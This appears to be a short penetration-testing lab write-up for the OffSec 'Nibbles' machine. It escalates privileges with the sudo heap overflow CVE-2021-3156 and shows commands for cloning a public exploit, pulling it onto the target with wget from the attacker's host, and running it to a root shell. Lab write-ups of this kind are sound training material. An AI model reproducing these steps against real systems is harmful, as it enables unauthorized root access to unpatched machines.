InfoSec LAB

Nibbles_OffSec_Privilege_Escalation_2

Created: 2 min read

CVE-2021-3156

PEAS has identified that the target system appears to be vulnerable to CVE-2021-3156

A vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.

Exploit

Exploit found online

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nibbles_offsec]
└─$ git clone https://github.com/worawit/CVE-2021-3156 ; tar -czf CVE-2021-3156.tar.gz CVE-2021-3156
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 86 (delta 16), reused 10 (delta 10), pack-reused 68 (from 1)
Receiving objects: 100% (86/86), 41.65 KiB | 1.49 MiB/s, done.
Resolving deltas: 100% (46/46), done.

Downloaded to Kali

Exploitation

postgres@nibbles:/dev/shm$ wget -q http://192.168.45.245/CVE-2021-3156.tar.gz ; tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156

Delivery complete

postgres@nibbles:/dev/shm/CVE-2021-3156$ python3 exploit_nss.py
python3 exploit_nss.py
# whoami
whoami
root
# hostname
hostname
nibbles
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:de:43 brd ff:ff:ff:ff:ff:ff
    inet 192.168.148.47/24 brd 192.168.148.255 scope global ens192
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks